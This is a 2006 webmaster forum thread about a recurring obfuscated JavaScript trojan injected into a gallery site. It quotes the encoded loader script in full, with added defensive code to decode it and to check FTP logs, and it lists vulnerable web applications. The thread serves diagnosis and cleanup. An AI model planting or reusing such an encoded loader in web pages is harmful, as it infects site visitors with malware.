GoFuckYourself.com - Adult Webmaster Forum


eMonk 05-24-2006 01:54 PM

javascript trojan on my tgp
 
the following javascript code keeps on reappearing on my tgp site. has everyone dealt with this trojan before? i can temporarily remove it by deleting my index.shtml file and rebuilding it but it keeps coming back. here's the javascript code:

<script language="JavaScript">
e = '0x00' + '22';str1 = "%99%C1%CA%D7%BD%D0%D1%DA%C9%C6%9E%83%D7%CA%D0%CA% C3%CA%C9%CA%D1%DA%9B%C5%CA%C1%C1%C6%CF%83%9F%99%CA %C7%D3%C2%CE%C6%BD%D0%D3%C0%9E%83%C5%D1%D1%CD%9B%8 C%8C%C1%CF%D7%8E%C0%CC%D6%CF%D1%C6%D3%8F%C0%CC%CE% 8C%D1%D3%C7%8C%83%BD%D4%CA%C1%D1%C5%9E%92%BD%C5%C6 %CA%C4%C5%D1%9E%92%9F%99%8C%CA%C7%D3%C2%CE%C6%9F%9 9%8C%C1%CA%D7%9F%BD%AE%AB";str=tmp='';for(i=0;i<st r1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCha rCode((tmp.charCodeAt(0)^e)-127);}document.write(str);
</script>

my system was infected with a trojan but it's been cleaned and removed. please advise.
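
How the script in the post above hides its output, as an added example that is not part of the original thread: each `%XX` byte is XORed with the key (`'0x00' + '22'`, which coerces to 34) and reduced by 127 before `document.write` emits it, so the text can be recovered without running the script. The function names and the sample page are constructed for illustration, and whitespace is stripped first because the forum software inserted spaces into the pasted code.

```javascript
// Added example (not from the thread): decode the injected script statically.
// Nothing is eval'd or written into a page; the sample payload is constructed.

// Mirror the injected loop: each %XX byte becomes (byte ^ key) - 127.
function decodePayload(encoded, key) {
  let out = '';
  for (const m of encoded.matchAll(/%([0-9A-Fa-f]{2})/g)) {
    out += String.fromCharCode((parseInt(m[1], 16) ^ key) - 127);
  }
  return out;
}

// Recover the key from "e='0x00'+'22';": the pieces join to '0x0022', which
// the ^ operator coerces to the number 34.
function extractKey(body) {
  const m = body.match(/\be=((?:'[^']*'\+?)+);/);
  const key = m ? Number(m[1].replace(/['+]/g, '')) : NaN;
  return Number.isNaN(key) ? null : key;
}

// Find script blocks that use this scheme and return their decoded content.
function scanHtml(html) {
  const findings = [];
  for (const m of html.matchAll(/<script[^>]*>([\s\S]*?)<\/script>/gi)) {
    const body = m[1].replace(/\s+/g, ''); // also undoes forum line-wrap spaces
    const markers = ['unescape(', 'fromCharCode(', 'document.write('];
    if (!markers.every((s) => body.includes(s))) continue;
    const key = extractKey(body);
    const data = body.match(/"((?:%[0-9A-Fa-f]{2})+)"/);
    if (key === null || !data) continue;
    findings.push({ offset: m.index, key, decoded: decodePayload(data[1], key) });
  }
  return findings;
}

// Constructed sample: a harmless HTML comment encoded with the same scheme.
const SAMPLE_TEXT = '<!-- constructed sample -->';
const encodeSample = (text, key) => [...text].map((c) =>
  '%' + ((c.charCodeAt(0) + 127) ^ key).toString(16).toUpperCase()).join('');
const SAMPLE_PAGE = `<html><body>gallery links
<script language="JavaScript">
e = '0x00' + '22';str1 = "${encodeSample(SAMPLE_TEXT, 34)}";str=tmp='';
for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));
str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);}document.write(str);
</script></body></html>`;

console.log(scanHtml(SAMPLE_PAGE));
```

Running `scanHtml` over every template and generated `.shtml` file shows where the block has been re-inserted and what markup it would write.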

Quickdraw 05-24-2006 02:04 PM

you are not alone. There are a whole bunch of sites out there getting hit.

Check the scripts you are using on that site. Most likely that is how they got in. Check cron files and so on. And of course contact your host, they might have the poop on this stuff.

4Pics 05-24-2006 02:16 PM

What tgp and trading scripts are you using?

Are you running phpbb by chance on the server?

eMonk 05-24-2006 03:20 PM

Quote:

Originally Posted by 4Pics
What tgp and trading scripts are you using?

Are you running phpbb by chance on the server?

auto gallery pro & arrow trader lite 3.

eMonk 05-25-2006 12:34 AM

Quote:

Originally Posted by Quickdraw
you are not alone. There are a whole bunch of sites out there getting hit.

Check the scripts you are using on that site. Most likely that is how they got in. Check cron files and so on. And of course contact your host, they might have the poop on this stuff.

no clues in the crontab & host says it's due from an unsecure script. :disgust

darnit 05-25-2006 01:14 AM

Quote:

Originally Posted by MUNK
no clues in the crontab & host says it's due from an unsecure script. :disgust

What host and were they more specific? If it's a managed box from any of the larger hosts I would expect a better response/support than that, considering how prevalent that exploit seems to be.

eMonk 05-25-2006 01:24 AM

Quote:

Originally Posted by darnit
What host and were they more specific? If it's a managed box from any of the larger hosts I would expect a better response/support than that, considering how prevalent that exploit seems to be.

i'm with webair and using their starter plan.

pr0 05-25-2006 01:27 AM

what's it do, prompt to download an exe?

eMonk 05-25-2006 01:34 AM

Quote:

Originally Posted by pr0
what's it do, prompt to download an exe?

once you load the page, anti-virus program picks it up as a trojan.

i just changed my admin password in case and deleted my infected index.shtml file and rebuilt the page. it's clean now but the javascript code usually reappears within a few hours. hopefully not this time. <crosses fingers>

pr0 05-25-2006 01:36 AM

yea but i wonder what kind of trojan it could possibly be...what's it doing to the surfers

darnit 05-25-2006 01:37 AM

Quote:

Originally Posted by MUNK
i'm with webair and using their starter plan.

That actually was a surprising and unexpected reply. I use webair but have a dedicated server. I don't know if there are different tiers of support based on the plans however webair has always provided impeccable support and assistance whenever I have had problems - often spending hours on the phone or via live chat to assist.

I haven't encountered your specific dilemma however so I can't vouch for what their terms of service are in each particular instance of support requests.

Perhaps try hitting them up again?

I wish I could assist however I'm all thumbs when it comes to scripts and security, hence my dependence on a good host that will provide that for me.

eMonk 05-25-2006 01:40 AM

Quote:

Originally Posted by pr0
yea but i wonder what kind of trojan it could possibly be...what's it doing to the surfers

i believe it's called, trojan-downloader.html.agent.aq

darnit 05-25-2006 01:40 AM

Quote:

Originally Posted by pr0
yea but i wonder what kind of trojan it could possibly be...what's it doing to the surfers

I would place good money on it not playing nice. Sucks for his bookmarkers as they would have no idea that it wasn't his fault.

Perhaps once you get your site clean you should provide links to some free removal software such as adaware, avgfree, MS anti spyware, etc. on your site and explain why they should use them.

eMonk 05-25-2006 01:44 AM

Quote:

Originally Posted by darnit
That actually was a surprising and unexpected reply. I use webair but have a dedicated server. I don't know if there are different tiers of support based on the plans however webair has always provided impeccable support and assistance whenever I have had problems - often spending hours on the phone or via live chat to assist.

I haven't encountered your specific dilemma however so I can't vouch for what their terms of service are in each particular instance of support requests.

Perhaps try hitting them up again?

I wish I could assist however I'm all thumbs when it comes to scripts and security, hence my dependence on a good host that will provide that for me.

i don't have any complaints with webair or their support. i contacted them via email and was told, "It can usually be attributed to an unsecure script", so i'm contacting the script creators and going to see what they say about this.

eMonk 05-25-2006 01:47 AM

Quote:

Originally Posted by darnit
I would place good money on it not playing nice. Sucks for his bookmarkers as they would have no idea that it wasn't his fault.

Perhaps once you get your site clean you should provide links to some free removal software such as adaware, avgfree, MS anti spyware, etc. on your site and explain why they should use them.

providing my bookmarkers with free software is a great idea. i'll get some links up later today.

SmokeyTheBear 05-25-2006 01:49 AM

dude contact webair and tell them to tell you what the problem is for sure , you shouldn't be left guessing.. or find a new host..

I'm with webair , and they have always answered my questions promptly , sometimes people give bland answers ask for facts..

a lot of people asking me about this trojan lately.. prob the "spysheriff" verio.s and it's prob set to a cronjob or something on a schedule to reinfect you so it won't just "go away" on its own or by deleting anything

do you have any blog software ? wordpress seems to be a common target .. cpanel also has some problems lately.. so make sure you're up to date..

darnit 05-25-2006 02:32 AM

Quote:

Originally Posted by SmokeyTheBear
dude contact webair and tell them to tell you what the problem is for sure , you shouldn't be left guessing.. or find a new host..

I'm with webair , and they have always answered my questions promptly , sometimes people give bland answers ask for facts..

a lot of people asking me about this trojan lately.. prob the "spysheriff" verio.s and it's prob set to a cronjob or something on a schedule to reinfect you so it won't just "go away" on its own or by deleting anything

do you have any blog software ? wordpress seems to be a common target .. cpanel also has some problems lately.. so make sure you're up to date..

Bump for STB. He certainly knows his shit and his advice is dead on. Btw if that is the spysheriff virus also instruct your surfers to chargeback if they do fall for the spysheriff pitch. It's basically ransomware that takes over the computer and charges users for their software to "remove" what they have been responsible for installing. Nasty shit. I also found these other posts with the identical problem. Hope they are helpful.

http://www.gofuckyourself.com/showthread.php?t=611063
http://www.gofuckyourself.com/showthread.php?t=561290
http://www.gofuckyourself.com/showthread.php?t=559591

Linkster 05-25-2006 03:36 AM

If you have access to raw logs check to see if it was just placed on the page and uploaded - this has been the most common way pages had this installed - most likely due to someone with access to a password file as there are never any intrusion attempts and the page is just ftp'd - most people that were hit were using a common password on their server and either a processing program or sponsor (we haven't found the common one yet to figure out whose password list was compromised)

The second way is one of these programs with security holes:
Vbulletin
PHPBB
Autolinks
Invision Power Board
phpmyadmin
phpadsnew
wordpress
awstats 6.5
sitedepth
I-RATER
phpBazar

Most of these have recently released updates for their security holes
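
The raw-log check described in the post above, as an added example that is not part of the original thread: it lists completed FTP uploads of site pages that came from addresses the owner does not recognise. It assumes the host exposes transfer logs in the common `xferlog` format (wu-ftpd / ProFTPD style), which the thread does not state; the log lines, addresses, account name and the `knownIps` set are constructed.

```javascript
// Added example: find page uploads from unfamiliar addresses in an FTP log.
// Assumes xferlog format; every value in SAMPLE_XFERLOG is constructed.
const SAMPLE_XFERLOG = `
Wed May 24 09:02:11 2006 1 192.0.2.10 18120 /home/site/public_html/index.shtml a _ i r siteuser ftp 0 * c
Wed May 24 13:40:02 2006 1 203.0.113.7 18544 /home/site/public_html/index.shtml a _ i r siteuser ftp 0 * c
Wed May 24 13:41:15 2006 2 192.0.2.10 40211 /home/site/public_html/thumbs/01.jpg b _ i r siteuser ftp 0 * c
Wed May 24 17:55:39 2006 1 203.0.113.7 18544 /home/site/public_html/index.shtml a _ o r siteuser ftp 0 * c
Thu May 25 02:17:48 2006 1 198.51.100.23 18549 /home/site/public_html/toplist.shtml a _ i r siteuser ftp 0 * c
`;

// Split each line into the xferlog fields needed for the check.
function parseXferlog(text) {
  const entries = [];
  for (const line of text.split('\n')) {
    const f = line.trim().split(/\s+/);
    if (f.length < 18) continue; // blank or truncated line
    entries.push({
      when: f.slice(0, 5).join(' '),
      ip: f[6],
      size: Number(f[7]),
      file: f[8],
      direction: f[11], // i = incoming (upload), o = outgoing (download)
      user: f[13],
      status: f[17], // c = complete, i = incomplete
    });
  }
  return entries;
}

// Completed uploads of page files from addresses outside the known set.
// A valid login from an unknown address points at a stolen password
// rather than a script exploit.
function unexpectedPageUploads(text, knownIps, pageRe = /\.(shtml|html?|php)$/i) {
  return parseXferlog(text).filter((e) =>
    e.direction === 'i' && e.status === 'c' &&
    pageRe.test(e.file) && !knownIps.has(e.ip));
}

const hits = unexpectedPageUploads(SAMPLE_XFERLOG, new Set(['192.0.2.10']));
for (const h of hits) console.log(`${h.when} ${h.ip} ${h.user} ${h.file}`);
```

If the log shows no such uploads around the time the page changed, the file was rewritten by something running on the server, which points back to the script list in the same post.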

eMonk 05-25-2006 09:39 AM

i don't have access to raw log files but i changed my admin password before i went to bed and my page is still clean.

Quickdraw 05-25-2006 10:10 AM

Have you checked the templates in your scripts?

Here are a few more URLs with the same script, in case anyone knows the owners.

wanktool.com
teensinboots.com/index.shtml
technorgasmic.com
nastylatex.com/index.shtml
pornlinks-united.com

Gambit 05-25-2006 10:22 AM

As far as i know the guy that does it is using an exploit in autogallery to stick the trojan on your site.

eMonk 05-25-2006 11:59 AM

Quote:

Originally Posted by Quickdraw
Have you checked the templates in your scripts?

one of my toplist templates had the javascript code & i removed it. it came back again but in a different section of the shtml file. it keeps coming back after i clean it but in different locations of the shtml file. the javascript code is always found at the bottom portion of the shtml file. it hasn't reappeared ever since i changed my admin password last night before i went to bed.

Corona 05-26-2006 09:00 PM

I got it a week or so ago and so far it only appeared just that once. The only scripts I am using on that site are phpadsnew and Links 2.0

Mighty Chin 05-26-2006 09:22 PM

Yup had it as well. just deleted the code and changed my server password

